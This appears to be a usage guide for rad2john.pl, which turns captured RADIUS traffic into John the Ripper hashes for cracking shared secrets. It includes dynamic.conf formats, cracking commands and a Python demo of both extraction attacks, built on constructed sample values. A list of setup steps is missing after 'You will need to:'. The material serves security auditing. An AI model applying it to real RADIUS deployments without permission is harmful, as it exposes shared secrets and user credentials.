The RADIUS protocol uses a shared secret between each client and the RADIUS server for two purposes: hiding user passwords in transit and authenticating the RADIUS server's replies. Both mechanisms are based on MD5 with a salt.
The attached perl script implements two attacks discussed in An Analysis of the RADIUS Authentication Protocol, by Joshua Hill.
To use this script, you will need john-1.7.9 with all the patches up to 0043-dynamic-salt-rewrite.
john will need to be configured so that dynamic_1008 implements md5($p.$s), and dynamic_1009 does md5($s.$p). Below are the changes to make to dynamic.conf to implement these formats:

####################################################################
# Dynamic type for algorithm used in RADIUS User-Password attribute md5($p.$s)
####################################################################
[List.Generic:dynamic_1008]
# expression shown will be this string:
Expression=md5($p.$s) [RADIUS User-Password]
# Flag needed here, is Salt
Flag=MGF_SALTED
# The salt has a fixed length of 16 bytes
Saltlen=16
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_keys
Func=DynamicFunc__append_salt
Func=DynamicFunc__crypt
Test=$dynamic_1008$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
Test=$dynamic_1008$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
Test=$dynamic_1008$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret

######################################################################
# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
######################################################################
[List.Generic:dynamic_1009]
Expression=md5($s.$p) [RADIUS Responses]
Flag=MGF_SALTED
Func=DynamicFunc__clean_input
Func=DynamicFunc__append_salt
Func=DynamicFunc__append_keys
Func=DynamicFunc__crypt
Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1
You will need to:
When you have obtained packet capture files, edit the perl script source file to tell it which login(s) you used in 1), then launch the perl script with the capture file(s) as arguments and redirect its output to a file:
perl rad2john.pl capture1.cap capture2.cap ... >radius.john
It will extract information from the capture files and dump it in dynamic_1008 or dynamic_1009 format, depending on whether the login found is known. By default, it will only dump one line per client machine seen, but this is also configurable (see the perl script file).
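The following is an added Python example, not the rad2john.pl script itself, that shows what the two dynamic formats above actually hash. It builds one Access-Request/Access-Accept pair from a constructed shared secret, known password and Request Authenticator (all sample values, not from a real capture), recovers md5(secret + Request Authenticator) from the User-Password attribute using the known password, takes the Response Authenticator and its packet prefix from the reply, and writes both as dynamic_1008 / dynamic_1009 lines. The `$HEX$` salt encoding is assumed to follow the Test= lines in the configuration above; the attribute layout follows RFC 2865. A final check function recomputes each hash for a candidate secret, which is what john does per guess, so you can confirm your dynamic.conf is wired correctly before running it against real captures.

```python
import hashlib
import struct

# Constructed sample values for the demonstration (not taken from any real capture).
SECRET = b"example-shared-secret"   # the shared secret the cracking run searches for
KNOWN_PASSWORD = b"hunter2"         # the login password you deliberately used in step 1)
REQ_AUTH = bytes.fromhex("0123456789abcdef0123456789abcdef")  # 16-byte Request Authenticator


def hide_password(password, secret, req_auth):
    """RFC 2865 5.2: pad the password to a multiple of 16 bytes and XOR each block with
    md5(secret + previous block); the first 'previous block' is the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(a ^ b for a, b in zip(padded[i:i + 16], key))
        out += block
        prev = block
    return out


def build_access_request(ident, req_auth, username, hidden_pw):
    """Code 1 (Access-Request) carrying User-Name (type 1) and User-Password (type 2)."""
    attrs = bytes([1, 2 + len(username)]) + username + bytes([2, 2 + len(hidden_pw)]) + hidden_pw
    return bytes([1, ident]) + struct.pack(">H", 20 + len(attrs)) + req_auth + attrs


def build_access_accept(ident, req_auth, secret, attrs=b""):
    """Code 2 (Access-Accept). RFC 2865 3: Response Authenticator =
    MD5(Code + ID + Length + RequestAuth + Attributes + Secret)."""
    head = bytes([2, ident]) + struct.pack(">H", 20 + len(attrs))
    return head + hashlib.md5(head + req_auth + attrs + secret).digest() + attrs


def parse_attrs(packet):
    """Return {type: value} for the TLV attributes that follow the 20-byte header."""
    attrs, i = {}, 20
    while i + 2 <= len(packet):
        t, l = packet[i], packet[i + 1]
        if l < 2:  # malformed length, stop rather than loop forever
            break
        attrs[t] = packet[i + 2:i + l]
        i += l
    return attrs


def request_to_dynamic_1008(request, known_password):
    """Attack 1 (User-Password): XOR the first hidden block with the known, NUL-padded password
    to recover md5(secret + RequestAuthenticator), i.e. md5($p.$s) with the authenticator as salt."""
    req_auth = request[4:20]
    hidden = parse_attrs(request)[2]
    padded = known_password[:16].ljust(16, b"\x00")
    digest = bytes(a ^ b for a, b in zip(hidden[:16], padded))
    return "$dynamic_1008$%s$HEX$%s" % (digest.hex(), req_auth.hex())


def response_to_dynamic_1009(request, response):
    """Attack 2 (Response Authenticator): reply header + request authenticator + reply attributes
    form the salt of md5($s.$p); the Response Authenticator field is the hash."""
    salt = response[:4] + request[4:20] + response[20:]
    return "$dynamic_1009$%s$HEX$%s" % (response[4:20].hex(), salt.hex())


def check_candidate(line, candidate):
    """Recompute, for one candidate secret, the hash john would compare against a line."""
    _, fmt, digest_hex, _hexflag, salt_hex = line.split("$")
    salt = bytes.fromhex(salt_hex)
    data = candidate + salt if fmt == "dynamic_1008" else salt + candidate
    return hashlib.md5(data).hexdigest() == digest_hex


def demo():
    """Build one request/accept pair with the constructed secret and return both john lines."""
    hidden = hide_password(KNOWN_PASSWORD, SECRET, REQ_AUTH)
    request = build_access_request(7, REQ_AUTH, b"alice", hidden)
    response = build_access_accept(7, REQ_AUTH, SECRET)
    return request_to_dynamic_1008(request, KNOWN_PASSWORD), response_to_dynamic_1009(request, response)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Only the first 16-byte block of User-Password is used for dynamic_1008, because later blocks are chained on the previous ciphertext block rather than on the Request Authenticator; that is why the format fixes Saltlen=16. For dynamic_1009 the salt is the whole reply prefix, so its length varies with the attributes the server returned.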
You can then launch john with the result file, using
john --format=dynamic_1008 radius.john
or
john --format=dynamic_1009 radius.john
depending on which attack you are interested in. You can of course add options to implement specific brute-force schemes.